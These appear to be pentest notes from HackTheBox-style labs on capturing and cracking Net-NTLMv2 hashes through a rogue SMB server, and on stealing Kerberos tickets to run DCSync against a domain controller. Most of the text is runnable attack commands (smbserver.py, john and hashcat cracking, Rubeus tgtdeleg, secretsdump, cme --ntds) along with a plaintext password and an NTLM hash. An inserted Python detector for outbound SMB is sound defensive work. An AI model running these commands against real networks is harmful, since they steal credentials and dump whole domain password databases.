For the SMB protocol, here is a quick way to grab a Net-NTLMv2 hash and crack it:

```
# Kali: start a rogue SMB server that records the NTLM authentication
Kali> smbserver.py -smb2support smb .

# Windows: create an empty file and copy it to the Kali share (this triggers the NTLM auth)
CMD> type nul > hello.txt
CMD> copy hello.txt \\10.10.14.107\smb

# Kali: copy and paste the captured hash line into hashes.txt
vi hashes.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
# or (-m 5600 is hashcat's NetNTLMv2 mode)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
```
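From the defender's side, the copy to \\10.10.14.107\smb works because a Windows client will authenticate with NTLM to whatever host it is pointed at, so outbound SMB (TCP/445) to a host that is not an approved file server is the event to alert on. The following is an added example, not part of the original notes: it runs over constructed Zeek-style conn.log lines, and the allowlist, internal ranges and log records are assumptions.

```python
from ipaddress import ip_address, ip_network

# Assumed allowlist of approved SMB file servers and internal ranges (constructed for this example).
APPROVED_SMB_SERVERS = {"10.10.10.5", "10.10.10.20"}
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

# Constructed Zeek-style conn.log records: ts, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto, service
SAMPLE_CONN_LOG = """\
1700000000.101\t10.10.10.50\t49812\t10.10.10.5\t445\ttcp\tsmb
1700000000.202\t10.10.10.50\t49813\t10.10.14.107\t445\ttcp\tsmb
1700000000.303\t10.10.10.51\t49814\t203.0.113.9\t445\ttcp\t-
1700000000.404\t10.10.10.51\t49815\t10.10.10.20\t443\ttcp\tssl
"""

def parse_conn_line(line):
    """Split one tab-separated conn.log record into a dict; None for blank or malformed lines."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) < 6:
        return None
    try:
        return {
            "src": ip_address(fields[1]),
            "dst": ip_address(fields[3]),
            "dport": int(fields[4]),
            "proto": fields[5],
        }
    except ValueError:
        return None

def classify_smb(rec):
    """Return a reason string if the record is SMB traffic to a non-approved host, else None."""
    if rec is None or rec["proto"] != "tcp" or rec["dport"] != 445:
        return None
    dst = rec["dst"]
    if not any(dst in net for net in INTERNAL_NETS):
        return "smb_to_external_host"              # classic NTLM leak to the Internet
    if str(dst) not in APPROVED_SMB_SERVERS:
        return "smb_to_unapproved_internal_host"   # e.g. a rogue smbserver.py on the LAN
    return None

def find_suspicious_smb(log_text):
    """Return (src, dst, reason) tuples for every SMB connection worth an alert."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_conn_line(line)
        reason = classify_smb(rec)
        if reason:
            hits.append((str(rec["src"]), str(rec["dst"]), reason))
    return hits
```

A real deployment would feed this from the SIEM's egress or Zeek data and pair it with an SMB egress block at the perimeter, which removes the external case entirely.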
Kerberos Tickets
For the current user, without knowing the password, use Rubeus.

```
# Run the command to get a TGT for the current user.
# Rubeus prints the Kerberos ticket in base64 format.
CMD> .\Rubeus.exe tgtdeleg /nowrap

# @Kali
# Copy the ticket into a file
vi kirbi.b64
# decode the base64 file -> binary .kirbi format used by mimikatz
base64 -d kirbi.b64 > ticket.kirbi
# Convert the kirbi to ccache for impacket and metasploit
impacket-ticketConverter ticket.kirbi G0.ccache
# Inject the ticket into memory
export KRB5CCNAME=G0.ccache   # This is the case of a machine certificate

# Fix the clock skew issue (Kerberos rejects tickets if clocks drift too far)
sudo ntpdate 10.129.228.120

# Validate that you can use the ticket (g0.flight.htb is the target machine)
cme smb g0.flight.htb -k --use-kcache
# Grab all NTDS content with the ticket
cme smb g0.flight.htb -k --use-kcache --ntds drsuapi
# DCSync with the ticket
impacket-secretsdump -no-pass -k g0.flight.htb -just-dc-user Administrator
```
For a user with a known password or NTLM hash, you can use the Impacket tools.

```
# impacket-getTGT with a password
impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl' -dc-ip $RHOST
# impacket-getTGT with an NTLM hash (-hashes takes LMHASH:NTHASH, the LM part may be empty)
impacket-getTGT ignite.local/yashika -hashes :64fbae31cc352fc26af97cbdef151e03 -dc-ip $RHOST
# Inject the ticket into memory
export KRB5CCNAME=d.klay.ccache
# The rest of the attack is the same as above.
```